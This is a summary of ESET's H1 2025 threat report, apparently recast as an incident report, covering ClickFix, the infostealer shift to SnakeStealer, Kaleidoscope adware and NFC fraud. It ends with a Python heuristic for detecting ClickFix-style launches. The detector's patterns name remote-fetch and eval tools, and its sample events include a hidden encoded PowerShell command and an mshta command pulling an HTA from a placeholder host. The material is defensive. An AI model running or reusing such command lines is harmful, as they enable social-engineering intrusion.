A view of the H1 2025 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts
Analysis Summary
This summary is based on the published summary of the ESET Threat Report H1 2025 and focuses on observed security trends rather than a single, specific organizational incident.
# Incident Report: ESET H1 2025 Threat Landscape Overview
## Executive Summary
The first half of 2025 was marked by significant shifts in malware trends, most notably the rapid emergence of the ClickFix attack vector, which increased by over 500%. The infostealer landscape also shifted, with SnakeStealer replacing Agent Tesla, while ESET actively contributed to disruption operations against Lumma Stealer and Danabot. On mobile, the sophisticated Kaleidoscope adware surged and NFC-based fraud grew exponentially, showing how readily attackers adapt across platforms.
## Incident Details
- **Discovery Date:** Throughout H1 2025 (Based on ESET Telemetry)
- **Incident Date:** H1 2025
- **Affected Organization:** Not a single organization; trends across global telemetry.
- **Sector:** All sectors globally (as reported by telemetry data)
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** Initial emergence detected throughout H1 2025.
- **Vector:** ClickFix manipulation (second most common vector after phishing) and traditional phishing campaigns fueling NFC fraud.
- **Details:** ClickFix tricks users into executing malicious commands disguised as error fixes; phishing drives the distribution of NFC fraud.
### Lateral Movement
- Not explicitly detailed for a single organization, but the payloads delivered after ClickFix infiltration varied, including ransomware and nation-state malware, implying that lateral movement capabilities are standard for these payloads.
### Data Exfiltration/Impact
- **Impact:** Infostealer activity (SnakeStealer being dominant); spreading of ransomware and nation-state malware; severe adware intrusions on Android (Kaleidoscope); NFC financial fraud.
### Detection & Response
- **How it was discovered:** Detected via ESET telemetry and research efforts.
- **Response actions taken:** ESET actively contributed to disruption operations targeting Lumma Stealer and Danabot malware-as-a-service threats.
## Attack Methodology
- **Initial Access:** ClickFix (deceptive execution command), Phishing.
- **Persistence:** Implied by the nature of deployed malware (infostealers, state-sponsored malware).
- **Privilege Escalation:** Not explicitly detailed, but required for the full impact of the deployed nation-state malware.
- **Defense Evasion:** Implied by the sophistication of threats like Kaleidoscope Adware.
- **Credential Access:** Dominated by SnakeStealer (new leading infostealer).
- **Discovery:** Not explicitly detailed.
- **Lateral Movement:** Implied by complex malware payload deployment.
- **Collection:** Infostealers (SnakeStealer).
- **Exfiltration:** Infostealers.
- **Impact:** Ransomware deployment, significant adware disruption (Kaleidoscope), and financial fraud via NFC exploitation.
## Impact Assessment
- **Financial:** Significant shifts in the ransomware economy (drop in ransom payments despite increased activity), new financial fraud via NFC.
- **Data Breach:** Prolific data theft via the rise of SnakeStealer as the top infostealer.
- **Operational:** Degradation of Android device performance due to Kaleidoscope adware. Disruption within the Ransomware-as-a-Service ecosystem.
- **Reputational:** Damage associated with major infostealer successes and widespread adware campaigns.
## Indicators of Compromise
- *Note: As this is a threat report summary, specific IoCs are not listed here; they require analysis of the full report beyond the provided text. The threats identified are: Agent Tesla (fading), SnakeStealer, Lumma Stealer, Danabot, Kaleidoscope (Android adware), and NGate, GhostTap and SuperCard (NFC threats).*
- **Behavioral indicators:** Users manipulated into executing malicious commands via ClickFix social engineering.
## Response Actions
- **Containment:** Not specified for individual victim environments.
- **Eradication:** ESET contributed to major disruption operations against Lumma and Danabot.
- **Recovery:** Not specified for individual victim environments.
## Lessons Learned
- **Key takeaways:** The threat landscape is highly dynamic, with social engineering techniques (ClickFix) growing exponentially to challenge long-standing methods like phishing. Mobile threats, particularly complex adware and NFC fraud, are rapidly evolving.
- **What could have been done better:** Increased vigilance against novel social engineering vectors like ClickFix is crucial.
## Recommendations
- Implement stronger user training specifically targeting unusual system prompts or "error-fixing" dialogs (ClickFix mitigation).
- Maintain up-to-date detection signatures to counter emerging infostealers like SnakeStealer.
- Implement layered security controls to monitor and restrict unauthorized NFC interactions, given the thirty-five-fold increase in related fraud.
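The first recommendation above (ClickFix mitigation) can be backed by a detection control as well as user training. The following is an added example, not code from the ESET report: a heuristic over process-creation events that flags a user-facing shell (explorer.exe, i.e. something the user clicked or typed into) directly launching a command interpreter whose command line carries obfuscation or remote-fetch traits, which is the execution pattern that "error-fix" social engineering produces. The event schema (`parent_image`, `image`, `command_line`, `pid`) and the sample events are constructed for this example and assumed, not taken from the report.

```python
"""
Heuristic detection of ClickFix-style execution: a user-facing shell spawning
a command interpreter with suspicious command-line traits.
Added example with a constructed, hypothetical event schema and sample data.
"""
import json
import re

# Parent processes that indicate a user-driven launch (assumption: explorer.exe
# is the shell behind the Run dialog, desktop and File Explorer on Windows).
USER_SHELLS = {"explorer.exe"}

# Interpreters commonly handed a pasted "fix" command.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line traits that are rare in legitimate interactive use.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"-(enc|encodedcommand|e)\b", re.I), "encoded_command"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden_window"),
    (re.compile(r"(invoke-webrequest|iwr|downloadstring|curl|bitsadmin|https?://)", re.I),
     "remote_fetch"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "dynamic_eval"),
    (re.compile(r"\bmshta\b.*https?://", re.I), "mshta_remote"),
]


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def classify(event: dict) -> dict:
    """Return findings for one process-creation event and whether it should alert.

    An alert requires BOTH the user-driven launch context and at least one
    suspicious command-line trait, so scheduled or service-driven encoded
    PowerShell (a common legitimate pattern) does not fire on its own.
    """
    parent = _basename(event.get("parent_image", ""))
    image = _basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    findings = []
    if parent in USER_SHELLS and image in INTERPRETERS:
        findings.append("interpreter_from_user_shell")
    for pattern, label in SUSPICIOUS_PATTERNS:
        if pattern.search(cmd):
            findings.append(label)
    alert = "interpreter_from_user_shell" in findings and len(findings) >= 2
    return {"pid": event.get("pid"), "alert": alert, "findings": findings}


def scan(lines):
    """Classify a sequence of JSON-encoded event lines."""
    return [classify(json.loads(line)) for line in lines if line.strip()]


# Constructed sample events (not real telemetry). The encoded payload and the
# URL are placeholders.
_events = [
    {"pid": 4101, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -EncodedCommand QQBBAEEAQQA="},
    {"pid": 4102, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://fix-update.example.invalid/error.hta"},
    {"pid": 4103, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -EncodedCommand QQBBAEEAQQA="},
    {"pid": 4104, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users"},
]
SAMPLE_EVENTS = [json.dumps(e) for e in _events]


if __name__ == "__main__":
    for result in scan(SAMPLE_EVENTS):
        print(result)
```

Events 4101 and 4102 alert (user shell plus hidden/encoded or remote-HTA traits); 4103 carries an encoded command but comes from a service host, and 4104 is an ordinary interactive PowerShell launch, so neither fires. In a real deployment the same two-factor rule maps naturally onto Sysmon Event ID 1 or EDR process-creation telemetry, and the pattern list should be tuned against the environment's own baseline of interactive interpreter use.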